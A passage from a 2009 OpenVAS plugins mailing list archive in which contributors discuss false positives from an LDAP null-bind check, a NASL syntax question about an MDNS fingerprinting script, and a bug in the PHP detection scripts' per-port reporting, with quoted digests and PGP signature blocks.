From bneumann at kattare.com Tue Mar 10 21:57:33 2009 From: bneumann at kattare.com (bneumann@kattare.com) Date: Tue, 10 Mar 2009 13:57:33 -0700 Subject: [Openvas-plugins] OpenVAS plugin for ldap Message-ID: <20090310135733.14043rl8gdsogb40@www.kattare.com> Hi Tarik, Since your plugin was added to OpenVAS, all the hosts in our network (more than 700) suddenly show up a security hole for ldap. here is the output from an html page: ================================== Vulnerability ldap (389/tcp) The LDAPserver allows null-binds and null- base requests OpenVAS ID : 1.3.6.1.4.1.25623.1.0.91984 Informational ldap (389/tcp) Grabbed the following information with a null- bind, null-base request: -------------------------------------------------------------------------------------------------- ldap_bind: Can't con OpenVAS ID : 1.3.6.1.4.1.25623.1.0.91984 Informational ldap (389/tcp) Grabbed the following information from the LDAP server: ---------------------------------------------------------------------------------------- ldap_bind: Can't con OpenVAS ID : 1.3.6.1.4.1.25623.1.0.91984 =================================== I assume "Can't con" means "Cannot connect." If the plugin cannot connect than there should not be any vulnerability present. Even hosts that are firewalled and do not allow acces to port 389/tcp and hosts that have port 389/tcp closed (because an ldap server is not running) show up as having this ldap vulnerability. What am I doing wrong? How can I avoid all these false positives? I would very much appreciate your help in this matter. Bernd Neumann bneumann at kattare.com From christian.edjenguele at owasp.org Tue Mar 10 13:52:48 2009 From: christian.edjenguele at owasp.org (Christian Eric Edjenguele) Date: Tue, 10 Mar 2009 13:52:48 +0100 Subject: [Openvas-plugins] help on nasl Message-ID: <49B662A0.7010207@owasp.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hello I'm writing a nvt to fingerprint os through MDNS on windows, I got an error, see screenshot attached for details. any suggestion ? Thanks. - -- Christian Eric Edjenguele IT Security Software Engineer / IT Enterprise Software Architect Mobile (IT): +39 3408580513 PGP KeyID: 0xB1654498 Key Server: http://pgp.mit.edu - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v1.4.9 (GNU/Linux) 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 E1MQObpE5A== =7VGF - -----END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEcBAEBAgAGBQJJtmKYAAoJENETScWxZUSY780H/jERGYucMuj/BIPAjzFHRr37 +gWWOF83plQCQ6UJhSGfzf0HSHpFKag6XwJ8Yq1piSk9E2qNfV8nB2NI0y0XxPUD cL1YDn0275zN+c8Otlvvi0o78xd2AVAIpki8O8jc/zR5beZMpFT9xDGPAogKCFbw RkIao07R/p40GXukihA6uhlmEojoXB3hVV8hnWBNXV3YbVdxn4PlS0GvikZKMTsh cfOIqzhuDBiNrQ+IV1irh0D9xCtu/7FI2coOxqvrDjEHlCz/lIH1IMfxLceRV83d PNL10Zn6g0zBSK7X0HesW/62CuRksivOfphdhWZTlVnFQE6MnIU4atWOSkui8Gk= =oogL -----END PGP SIGNATURE----- -------------- next part -------------- A non-text attachment was scrubbed... Name: Screenshot-chrix at darkstar: ~-Workspaces-OpenVAS-trunk-openvas-plugins-scripts.png Type: image/png Size: 374523 bytes Desc: not available Url : http://lists.wald.intevation.org/pipermail/openvas-plugins/attachments/20090310/c08bc39f/-Workspaces-OpenVAS-trunk-openvas-plugins-scripts-0001.png -------------- next part -------------- A non-text attachment was scrubbed... Name: Screenshot-remote-detect-MDNS.nasl (~-Workspaces-OpenVAS-trunk-openvas-plugins-scripts) - VIM.png Type: image/png Size: 443646 bytes Desc: not available Url : http://lists.wald.intevation.org/pipermail/openvas-plugins/attachments/20090310/c08bc39f/Screenshot-remote-detect-MDNS.nasl-Workspaces-OpenVAS-trunk-openvas-plugins-scripts-VIM-0001.png From kost at linux.hr Thu Mar 12 10:48:57 2009 From: kost at linux.hr (Vlatko Kosturjak) Date: Thu, 12 Mar 2009 10:48:57 +0100 Subject: [Openvas-plugins] bug in php detection scripts Message-ID: <49B8DA89.7000709@linux.hr> Hello! Imagine following scenario. I have 5 web/http ports on single IP address. one have PHP and it is vulnerable, but it will report all 5 http ports are prone to php vulnerability. It's because it sets general PHP/Version variable and I get that all http ports are vulnerable. It would be good (and correct) to put PHP under following hieararchy: www//phpversion=x.x.x Currently it is bugged and reports the non-existant vulnerabilities to other ports. Specifically secpod_php_sec_bypass_n_file_write_vuln_900184.nasl and gb_php_detect.nasl Kost From bchandra at secpod.com Thu Mar 12 11:42:55 2009 From: bchandra at secpod.com (Chandrashekhar B) Date: Thu, 12 Mar 2009 16:12:55 +0530 Subject: [Openvas-plugins] help on nasl In-Reply-To: <49B662A0.7010207@owasp.org> References: <49B662A0.7010207@owasp.org> Message-ID: <6BCBF723D32046D09C6B551F4DF1759A@bchandra> Christian, What's 'X' supposed to do in ln 80? Guess, you wanted it to be '*' ? Chandra. -----Original Message----- From: openvas-plugins-bounces at wald.intevation.org [mailto:openvas-plugins-bounces at wald.intevation.org] On Behalf Of Christian Eric Edjenguele Sent: Tuesday, March 10, 2009 6:23 PM To: openvas-plugins at wald.intevation.org Subject: [Openvas-plugins] help on nasl -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hello I'm writing a nvt to fingerprint os through MDNS on windows, I got an error, see screenshot attached for details. any suggestion ? Thanks. - -- Christian Eric Edjenguele IT Security Software Engineer / IT Enterprise Software Architect Mobile (IT): +39 3408580513 PGP KeyID: 0xB1654498 Key Server: http://pgp.mit.edu - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v1.4.9 (GNU/Linux) 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 E1MQObpE5A== =7VGF - -----END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEcBAEBAgAGBQJJtmKYAAoJENETScWxZUSY780H/jERGYucMuj/BIPAjzFHRr37 +gWWOF83plQCQ6UJhSGfzf0HSHpFKag6XwJ8Yq1piSk9E2qNfV8nB2NI0y0XxPUD cL1YDn0275zN+c8Otlvvi0o78xd2AVAIpki8O8jc/zR5beZMpFT9xDGPAogKCFbw RkIao07R/p40GXukihA6uhlmEojoXB3hVV8hnWBNXV3YbVdxn4PlS0GvikZKMTsh cfOIqzhuDBiNrQ+IV1irh0D9xCtu/7FI2coOxqvrDjEHlCz/lIH1IMfxLceRV83d PNL10Zn6g0zBSK7X0HesW/62CuRksivOfphdhWZTlVnFQE6MnIU4atWOSkui8Gk= =oogL -----END PGP SIGNATURE----- From bchandra at secpod.com Thu Mar 12 11:45:07 2009 From: bchandra at secpod.com (Chandrashekhar B) Date: Thu, 12 Mar 2009 16:15:07 +0530 Subject: [Openvas-plugins] bug in php detection scripts In-Reply-To: <49B8DA89.7000709@linux.hr> References: <49B8DA89.7000709@linux.hr> Message-ID: <3FE1A4912A75412D8347EAD7D1A88FA8@bchandra> Hello Kost, Thanks for reporting. There's actually another KB item called "PHP/Port" set along with "PHP/Version" which is being used in some scripts and some aren't using it. We are addressing this now. Thanks, Chandra. -----Original Message----- From: openvas-plugins-bounces at wald.intevation.org [mailto:openvas-plugins-bounces at wald.intevation.org] On Behalf Of Vlatko Kosturjak Sent: Thursday, March 12, 2009 3:19 PM To: openvas-plugins Subject: [Openvas-plugins] bug in php detection scripts Hello! Imagine following scenario. I have 5 web/http ports on single IP address. one have PHP and it is vulnerable, but it will report all 5 http ports are prone to php vulnerability. It's because it sets general PHP/Version variable and I get that all http ports are vulnerable. It would be good (and correct) to put PHP under following hieararchy: www//phpversion=x.x.x Currently it is bugged and reports the non-existant vulnerabilities to other ports. Specifically secpod_php_sec_bypass_n_file_write_vuln_900184.nasl and gb_php_detect.nasl Kost _______________________________________________ Openvas-plugins mailing list Openvas-plugins at wald.intevation.org http://lists.wald.intevation.org/mailman/listinfo/openvas-plugins From c_edjenguele at yahoo.it Thu Mar 12 12:53:08 2009 From: c_edjenguele at yahoo.it (Christian Eric EDJENGUELE) Date: Thu, 12 Mar 2009 11:53:08 +0000 (GMT) Subject: [Openvas-plugins] Openvas-plugins Digest, Vol 16, Issue 2 References: Message-ID: <230891.51190.qm@web28604.mail.ukl.yahoo.com> > > Message: 2 > Date: Thu, 12 Mar 2009 16:12:55 +0530 > From: "Chandrashekhar B" > Subject: Re: [Openvas-plugins] help on nasl > To: , > > Message-ID: <6BCBF723D32046D09C6B551F4DF1759A at bchandra> > Content-Type: text/plain; charset="us-ascii" > > Christian, > > What's 'X' supposed to do in ln 80? Guess, you wanted it to be '*' ? accoring to the documentation (http://www.virtualblueness.net/nasl..html#tth_sEc2.7.1) the 'x' operator must repeat the string 'x times' or not ? > > Chandra. > > -----Original Message----- > From: openvas-plugins-bounces at wald.intevation.org > [mailto:openvas-plugins-bounces at wald.intevation.org] On Behalf Of Christian > Eric Edjenguele > Sent: Tuesday, March 10, 2009 6:23 PM > To: openvas-plugins at wald.intevation..org > Subject: [Openvas-plugins] help on nasl > > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Hello I'm writing a nvt to fingerprint os through MDNS on windows, I got > an error, see screenshot attached for details. > > any suggestion ? > Thanks. > - -- > Christian Eric Edjenguele > IT Security Software Engineer / IT Enterprise Software Architect > Mobile (IT): +39 3408580513 > PGP KeyID: 0xB1654498 > Key Server: http://pgp.mit.edu > - -----BEGIN PGP PUBLIC KEY BLOCK----- > Version: GnuPG v1.4.9 (GNU/Linux) > > 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 > E1MQObpE5A== > =7VGF > - -----END PGP PUBLIC KEY BLOCK----- > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.9 (GNU/Linux) > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org > > iQEcBAEBAgAGBQJJtmKYAAoJENETScWxZUSY780H/jERGYucMuj/BIPAjzFHRr37 > +gWWOF83plQCQ6UJhSGfzf0HSHpFKag6XwJ8Yq1piSk9E2qNfV8nB2NI0y0XxPUD > cL1YDn0275zN+c8Otlvvi0o78xd2AVAIpki8O8jc/zR5beZMpFT9xDGPAogKCFbw > RkIao07R/p40GXukihA6uhlmEojoXB3hVV8hnWBNXV3YbVdxn4PlS0GvikZKMTsh > cfOIqzhuDBiNrQ+IV1irh0D9xCtu/7FI2coOxqvrDjEHlCz/lIH1IMfxLceRV83d > PNL10Zn6g0zBSK7X0HesW/62CuRksivOfphdhWZTlVnFQE6MnIU4atWOSkui8Gk= > =oogL > -----END PGP SIGNATURE----- > > > > ------------------------------ > > Message: 3 > Date: Thu, 12 Mar 2009 16:15:07 +0530 > From: "Chandrashekhar B" > Subject: Re: [Openvas-plugins] bug in php detection scripts > To: "'Vlatko Kosturjak'" , "'openvas-plugins'" > > Message-ID: <3FE1A4912A75412D8347EAD7D1A88FA8 at bchandra> > Content-Type: text/plain; charset="us-ascii" > > Hello Kost, > > Thanks for reporting. There's actually another KB item called "PHP/Port" set > along with "PHP/Version" which is being used in some scripts and some aren't > using it. We are addressing this now. > > Thanks, > Chandra. > > > -----Original Message----- > From: openvas-plugins-bounces at wald.intevation.org > [mailto:openvas-plugins-bounces at wald.intevation.org] On Behalf Of Vlatko > Kosturjak > Sent: Thursday, March 12, 2009 3:19 PM > To: openvas-plugins > Subject: [Openvas-plugins] bug in php detection scripts > > Hello! > > Imagine following scenario. I have 5 web/http ports on single IP > address. one have PHP and it is vulnerable, but it will report all 5 > http ports are prone to php vulnerability. > > It's because it sets general PHP/Version variable and I get that all > http ports are vulnerable. > > It would be good (and correct) to put PHP under following hieararchy: > www//phpversion=x.x.x > > Currently it is bugged and reports the non-existant vulnerabilities to > other ports. Specifically > secpod_php_sec_bypass_n_file_write_vuln_900184.nasl > and > gb_php_detect.nasl > > Kost > _______________________________________________ > Openvas-plugins mailing list > Openvas-plugins at wald.intevation.org > http://lists.wald.intevation.org/mailman/listinfo/openvas-plugins > > > > ------------------------------ > > _______________________________________________ > Openvas-plugins mailing list > Openvas-plugins at wald.intevation.org > http://lists.wald.intevation.org/mailman/listinfo/openvas-plugins > > > End of Openvas-plugins Digest, Vol 16, Issue 2 > ********************************************** From bchandra at secpod.com Thu Mar 12 13:24:09 2009 From: bchandra at secpod.com (Chandrashekhar B) Date: Thu, 12 Mar 2009 17:54:09 +0530 Subject: [Openvas-plugins] Openvas-plugins Digest, Vol 16, Issue 2 In-Reply-To: <230891.51190.qm@web28604.mail.ukl.yahoo.com> References: <230891.51190.qm@web28604.mail.ukl.yahoo.com> Message-ID: That's only to call a function repeatedly. I am not sure what you are trying to do. Chandra. -----Original Message----- From: openvas-plugins-bounces at wald.intevation.org [mailto:openvas-plugins-bounces at wald.intevation.org] On Behalf Of Christian Eric EDJENGUELE Sent: Thursday, March 12, 2009 5:23 PM To: openvas-plugins at wald.intevation.org Subject: Re: [Openvas-plugins] Openvas-plugins Digest, Vol 16, Issue 2 > > Message: 2 > Date: Thu, 12 Mar 2009 16:12:55 +0530 > From: "Chandrashekhar B" > Subject: Re: [Openvas-plugins] help on nasl > To: , > > Message-ID: <6BCBF723D32046D09C6B551F4DF1759A at bchandra> > Content-Type: text/plain; charset="us-ascii" > > Christian, > > What's 'X' supposed to do in ln 80? Guess, you wanted it to be '*' ? accoring to the documentation (http://www.virtualblueness.net/nasl..html#tth_sEc2.7.1) the 'x' operator must repeat the string 'x times' or not ? > > Chandra. > > -----Original Message----- > From: openvas-plugins-bounces at wald.intevation.org > [mailto:openvas-plugins-bounces at wald.intevation.org] On Behalf Of Christian > Eric Edjenguele > Sent: Tuesday, March 10, 2009 6:23 PM > To: openvas-plugins at wald.intevation..org > Subject: [Openvas-plugins] help on nasl > > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Hello I'm writing a nvt to fingerprint os through MDNS on windows, I got > an error, see screenshot attached for details. > > any suggestion ? > Thanks. > - -- > Christian Eric Edjenguele > IT Security Software Engineer / IT Enterprise Software Architect > Mobile (IT): +39 3408580513 > PGP KeyID: 0xB1654498 > Key Server: http://pgp.mit.edu > - -----BEGIN PGP PUBLIC KEY BLOCK----- > Version: GnuPG v1.4.9 (GNU/Linux) > > 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 > E1MQObpE5A== > =7VGF > - -----END PGP PUBLIC KEY BLOCK----- > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.9 (GNU/Linux) > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org > > iQEcBAEBAgAGBQJJtmKYAAoJENETScWxZUSY780H/jERGYucMuj/BIPAjzFHRr37 > 